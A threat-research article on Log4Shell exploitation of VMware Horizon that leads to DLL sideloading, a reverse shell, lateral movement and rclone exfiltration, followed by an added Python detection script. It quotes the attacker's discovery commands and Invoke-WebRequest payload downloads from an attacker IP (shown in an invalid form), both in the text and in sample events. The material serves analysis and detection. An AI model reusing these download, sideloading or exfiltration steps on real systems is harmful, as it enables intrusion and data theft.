Trend Micro Research recently analyzed several cases of the Log4Shell vulnerability being exploited in certain versions of VMware Horizon. After investigating the chain of events, we found that many of these attacks resulted in data being exfiltrated from the infected systems. We also found that some of the victims were infected with ransomware days after the data exfiltration.

This investigation is related to a recent report from the security team Sentinel Labs, which describes a technique used by the LockBit ransomware-as-a-service (RaaS) operation that takes advantage of a command line utility shipped with VMware. Their investigation showed that this utility can be abused to sideload a malicious DLL. We observed behavior similar to what Sentinel Labs reported in terms of entry point and sideloading, but the investigation discussed in this article focuses on the techniques used for exfiltration and lateral movement.

The attack starts with exploitation of the Log4j vulnerability (Log4Shell) in VMware Horizon. The exploit spawns a PowerShell instance to execute commands. The threat actor uses PowerShell to discover the victim network, then downloads mfeann.exe, LockDown.DLL, and c0000012.log. Here are the commands:

C:\windows\system32\nltest /domain_trusts
C:\windows\system32\net user StantoDe /domain
Invoke-WebRequest -uri hxxp://4532.108.54:443/mfeann.exe -OutFile C:\users\public\mfeann.exe
Invoke-WebRequest -uri hxxp://4532.108.54:443/LockDown.DLL -OutFile C:\users\public\LockDown.DLL

In the cases we analyzed, different legitimate executables were used to sideload malicious DLLs. The file mfeann.exe is an executable responsible for event creation and logging. It is legitimate and signed by a known security company, but the threat actors misused it to sideload a malicious DLL named LockDown.DLL. In another intrusion we analyzed, the threat actor downloaded a different legitimate executable, VMwareXferlog.exe, and used the same technique to sideload the malicious DLL glib-2.0.DLL.

Lateral movement to machines in the network

After the initial infection with Cobalt Strike, we observed that the threat actor dropped node.exe, which is the Stowaway proxy tool that is publicly available on GitHub. The tool is written in Go and provides many capabilities to threat actors: remote shell execution, file upload and download, and more. In this case, the tool was used to provide a reverse shell to the threat actors at IP 4532.108.54 on port 80.

After a successful connection to the command-and-control (C&C) IP, we saw outbound traffic from the infected host to several internal machines over SMB and WMI. The files mfeann.exe, LockDown.DLL, and update.exe (accessed via the node.exe tool) were dropped on the identified internal machines. In one case, we found an interesting binary named update.exe. The file is actually the rclone.exe tool, used to exfiltrate data to a specific Dropbox location.
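The behaviors in this chain (domain discovery commands, Invoke-WebRequest downloads into C:\users\public, a signed binary sideloading a DLL, a proxy running from a user-writable directory calling out, and rclone renamed to update.exe) map directly onto endpoint telemetry. The Python below is an added example written for this article; it is not code from Trend Micro or from the Stowaway or rclone projects. It runs over a handful of constructed Sysmon-style events (the field names event, host, image, cmdline, loaded, signed, dst_port and original_filename are assumptions standing in for a real log schema), and it generalises the sideloading case to any signed binary that loads a DLL from a user-writable directory. The renamed-tool rule assumes the PE version resource's OriginalFileName is intact, which renaming a file on disk does not change.

```python
"""Triage rules for the Log4Shell-to-exfiltration chain described above.

Added example for this article, not code from Trend Micro or from the tools named.
Events are constructed Sysmon-style dicts; the field names are an assumption.
"""
import re

# Sideload pairs reported in the article: abused host executable -> malicious DLL.
SIDELOAD_PAIRS = {
    "mfeann.exe": "lockdown.dll",
    "vmwarexferlog.exe": "glib-2.0.dll",
}

# Directories a low-privileged user can write to (assumption; tune per environment).
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Discovery commands seen in the article.
DISCOVERY = [
    re.compile(r"\bnltest(\.exe)?\s+/domain_trusts\b", re.I),
    re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+/domain\b", re.I),
]
# Invoke-WebRequest writing its payload into C:\users\public.
DOWNLOAD = re.compile(r'invoke-webrequest\b.*-outfile\s+"?(c:\\users\\public\\[^\s"]+)', re.I)


def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_writable_dir(path):
    return path.lower().startswith(USER_WRITABLE)


def triage(events):
    """Return (rule, host, detail) for every event that matches a rule, in input order."""
    hits = []
    for ev in events:
        host, image, kind = ev.get("host", "?"), ev.get("image", ""), ev.get("event")
        if kind == "process_create":
            cmd = ev.get("cmdline", "")
            for rx in DISCOVERY:
                if rx.search(cmd):
                    hits.append(("discovery", host, cmd))
            m = DOWNLOAD.search(cmd)
            if m:
                hits.append(("download_to_public", host, m.group(1)))
            # Sysmon copies OriginalFileName from the PE version resource, so a tool that
            # was only renamed on disk (update.exe) still reports its real name (rclone.exe).
            orig = ev.get("original_filename", "").lower()
            if orig and orig != basename(image):
                hits.append(("renamed_binary", host, f"{basename(image)} is really {orig}"))
        elif kind == "image_load":
            exe, dll = basename(image), ev.get("loaded", "")
            if SIDELOAD_PAIRS.get(exe) == basename(dll):
                hits.append(("known_sideload", host, f"{exe} -> {basename(dll)}"))
            # Generalisation: any signed binary loading a DLL from a user-writable directory.
            if ev.get("signed") and in_writable_dir(dll):
                hits.append(("dll_from_writable_dir", host, f"{exe} loaded {dll}"))
        elif kind == "network_connect" and in_writable_dir(image):
            # The Stowaway agent (node.exe) ran from C:\users\public and called out on port 80.
            hits.append(("writable_dir_netconn", host,
                         f"{basename(image)} -> port {ev.get('dst_port')}"))
    return hits


# Constructed sample telemetry modelled on the article (not real logs).
SAMPLE_EVENTS = [
    {"event": "process_create", "host": "horizon01", "image": "C:\\Windows\\System32\\nltest.exe",
     "cmdline": "C:\\windows\\system32\\nltest /domain_trusts"},
    {"event": "process_create", "host": "horizon01", "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "C:\\windows\\system32\\net user StantoDe /domain"},
    {"event": "process_create", "host": "horizon01",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe Invoke-WebRequest -uri hxxp://4532.108.54:443/mfeann.exe "
                "-OutFile C:\\users\\public\\mfeann.exe"},
    {"event": "image_load", "host": "horizon01", "image": "C:\\users\\public\\mfeann.exe",
     "loaded": "C:\\users\\public\\LockDown.DLL", "signed": True},
    {"event": "image_load", "host": "horizon01", "image": "C:\\Windows\\System32\\svchost.exe",
     "loaded": "C:\\Windows\\System32\\kernel32.dll", "signed": True},          # benign
    {"event": "network_connect", "host": "horizon01", "image": "C:\\users\\public\\node.exe",
     "dst_port": 80},
    {"event": "process_create", "host": "fs02", "image": "C:\\users\\public\\update.exe",
     "original_filename": "rclone.exe",
     "cmdline": "C:\\users\\public\\update.exe copy D:\\finance dropbox:staging"},
    {"event": "process_create", "host": "fs02", "image": "C:\\Windows\\explorer.exe",
     "original_filename": "EXPLORER.EXE", "cmdline": "C:\\Windows\\explorer.exe"},  # benign
]

if __name__ == "__main__":
    for rule, host, detail in triage(SAMPLE_EVENTS):
        print(f"{host:10} {rule:22} {detail}")
```

Running the file prints one line per hit; the two benign events (a system DLL load and explorer.exe, whose OriginalFileName differs only in case) produce nothing. The renamed-binary rule is the cheapest way to catch a tool like rclone hiding as update.exe, but it is defeated if the operator rebuilds the binary with edited version information, so pair it with file-hash or signer checks rather than relying on it alone.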